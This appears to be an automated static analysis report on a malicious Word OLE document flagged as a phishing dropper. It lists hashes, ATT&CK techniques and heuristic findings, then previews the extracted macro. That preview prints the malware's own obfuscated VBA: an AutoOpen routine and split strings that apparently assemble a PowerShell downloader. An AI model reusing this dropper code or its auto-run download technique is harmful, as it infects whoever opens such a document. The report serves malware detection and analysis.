Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c9ecc1b91c2dbe98…

MALICIOUS

Office (OLE)

Size: 168.4 KB
First seen: 2018-02-19
MD5: 83de71039b31cdf2f9ce75aeb26a16b3
SHA-1: 2a8b4f1b67278cd9853071f1cab9e96c1ab8dc72
SHA-256: c9ecc1b91c2dbe98f29dd63fe3638a1fdbcc0ca7bca68e0903e2b7797aac604f
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro with an AutoOpen function, so the macro code runs as soon as the document is opened with macros enabled. The macro uses the Shell() function and Application.Run to execute arbitrary code, a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further suggests a phishing lure designed to drop malware.

Heuristics (6)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 60497 bytes
SHA-256: 9225d48fe8fb6837914ab7f404032b738a36eec65993cce65110ea0d8142d9c4

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mbOAbqH"
Sub AutoOpen()
On Error Resume Next
jicJmFTIX = 4889557 * Sqr(jZIuYEbfQtB) * nsuVDpaBCRYXW / CStr(5318874) * (6915086 / CDate(CduXFPJT) * 557708 / ChrW(qBcSNpfso) * 3258842 * Int(jQTwYXOBkYzUP))
dmzdlXiaS = 8036597 * Sqr(ZYkDjsimTSSNab) * svSSpthMobqB / CStr(1310944) * (3416467 / CDate(RRaUWznKSstK) * 230447 / ChrW(LYYCEfnIAAFsMv) * 5415934 * Int(rXUkABmGEhEkA))
avifPdDSw = 415084 * Sqr(uJQaPimsiZAW) * QwKlRwXaDHaEW / CStr(2451740) * (9499363 / CDate(ZasViqqkM) * 8334044 / ChrW(uMBaZZtPTTR) * 84924 * Int(iLrCqVs))
RpZJzIBHa = 1019623 * Sqr(YaXcOBjAfd) * izHZrqWwotrwIF / CStr(7468042) * (8530054 / CDate(RXlpNtsZdBz) * 8115554 / ChrW(qpPULZBZRK) * 7069116 * Int(QjhbPXbIEjI))
Application.Run "UOtuCsQYh", SjIdJVsJjmfSc
rIQGPzOoZ = 1622423 * Sqr(DCjotMqCA) * BNwMLwNdV / CStr(6393138) * (3280340 / CDate(hYMuTmZ) * 522120 / ChrW(LTwdisadOS) * 466111 * Int(vquTtEBAKDbB))
zVLcztEcz = 8293169 * Sqr(uwjjFmAGOOWlh) * bZhXCLHrw / CStr(6174020) * (1850462 / CDate(wiVNZmDAAUKY) * 9225924 / ChrW(KwMmajdKY) * 3748289 * Int(FvfhCBDWYo))
VlBpkihRG = 2953335 * Sqr(boALfJFa) * oGCrUrY / CStr(3591327) * (9543817 / CDate(HBXZoLKzp) * 248443 / ChrW(tSENdGfWWrzwUA) * 2983483 * Int(KUtJOTmIHEPL))
zUMQYIunz = 5710016 * Sqr(ktvabJFDYZcAc) * rjZfvFZqTXBfhX / CStr(2329131) * (1026689 / CDate(ljiIQSsLwBB) * 8223130 / ChrW(WTjUhbVICXRu) * 4980729 * Int(ZvciqTzrUw))
End Sub
Function SjIdJVsJjmfSc()
On Error Resume Next
iJXmFk = ("Dz8VpvpS7S2Xs/'+'UyRC+yRC5PyRC+yR'+'CXQ/yRC+ywD1TiMUJL8k")
wvCHOVo = 1100842 * Sqr(EErYqiVcuMD) * MMwFIFnUUvb / CStr(7609318) * (6684439 / CDate(vUZczjDskntJM) * 7104143 / ChrW(ZbfpWdm) * 2216625 * Int(zTVkLJcEpBjAD))
aXipj = 3500350 * Sqr(UZTcJMwsC) * uTwwMMIIj / CStr(5911872) * (6120818 / CDate(ShbKoULBC) * 4264214 / ChrW(SUzJKCcz) * 5289837 * Int(TRpfGdparT))
qEuYlYLu = Mid(iJXmFk, 13, 33)
LvQEfjU = ("SdNijU3wEtEbSqQcsR5rroIC{yRC+yRDMw+DMw'+'CtyRC+yRCryyRC+yRC{qyRC+yRC8hfranyRC+yRCDMw+DMwcyRC+yRC.DoyRC+yRCw'+'nloaDMw+D'+'MwdFyRC+yRCDMcMdC4J")
qjhsYoUaINL = 7658468 * Sqr(aDWntQYj) * DBLJauWGiFcjw / CStr(4954628) * (7967571 / CDate(HwjztkQjk) * 8595870 / ChrW(WrHMpGm) * 6500839 * Int(wTnMAIoj))
EwwIbzr = 2134904 * Sqr(bijZmSojwSk) * YhtAPXtmdLr / CStr(5757230) * (3409094 / CDate(KWzkvjVKQWqSV) * 8856046 / ChrW(aqOaSvF) * 3602743 * Int(tRqYwPm))
tUpOWFwib = Mid(LvQEfjU, 24, 112)
OJbpWzPH = ("QfmciXHMW+'wRC+yRCp'+'yRC+y'+'RDMw+'+'DMwC.yDMw+DMwRC+yRCcyRC+'+'yRCom/asset11ic36tw9")
jUZHszST = 7361467 * Sqr(miMDKrljqL) * IIuNzLUHb / CStr(7739932) * (454184 / CDate(iUKIzJzhZ) * 1816668 / ChrW(JlijjCXSRt) * 7648474 * Int(ZajOAfI))
mjPYIOJhkk = 2028427 * Sqr(kMdizioXtdqw) * kcUblFEVlZvPl / CStr(6600114) * (3339404 / CDate(wCQwmZYAAjTjuX) * 2991073 / ChrW(GkqDtYtDGMzniT) * 2769982 * Int(WczbZAC))
zqCzzsJTncw = Mid(OJbpWzPH, 10, 67)
whsbV = ("lHHLIqorg/ZLyRC+yRCk'+'pyRC+yRCaPyRC+yRCoT.'+'yRC+yRCSyRC+yRCplit(PoT,PoT);q8hkyRC+yRCayRC+yR'+'CrapDMw+DMwaDMw+DMws =yRC+yRC q8yRC+yc49P8US")
rhHtpit = 7069353 * Sqr(CuhSJInVZ) * TNNbZQv / CStr(1560031) * (7750398 / CDate(IjWHKDqzVLzEu) * 6612785 / ChrW(DKzbcwILJu) * 9084288 * Int(AACRzowJVYaIGS))
fmCqKLmULD = 7615157 * Sqr(OBOSfDWGwjLqAV) * NPHpzTtA / CStr(3121256) * (9644393 / CDate(BfkqVKKIwH) * 6143247 / ChrW(PzdvVSdFIAL) * 2519771 * Int(wdojVBwUGBrWF))
irQiwr = Mid(whsbV, 7, 127)
wiLOKUzOJV = ("nDwzFDPVcDCWLozRC+yRC}yRC+yRCcatch{wriyRC+yRCtyRC+yRCe-host q8hDMw+DMwyRC'+'+yRC_.EyRC+y'+'RCxceptiDMw+DMwo'+'yRC+yD'+'Mw+DMwRCn.MyRC+yRCes'+'yRC+yRCsa'+'y'+'RC+yRCge;}}y'+'RC).rEPLace(yRCq8hyD3rbiVXOVsUcVc")
pMuGo = 9481800 * Sqr(ziiwjwIaLSAZMr) * QvDSimWfUvOZI / CStr(3691783) * (1331112 / CDate(ziIjbYojK) * 7864498 / ChrW(zKoaMIQXYFzSM) * 5437124 * Int(NAUYzHEBBuDKPs))
PuoXcww = 1397661 * Sqr(IptXVfVCRs) * iLBLvEcKnOlplu / CStr(1728573) * (7666562 / CDate(IwA
... (truncated)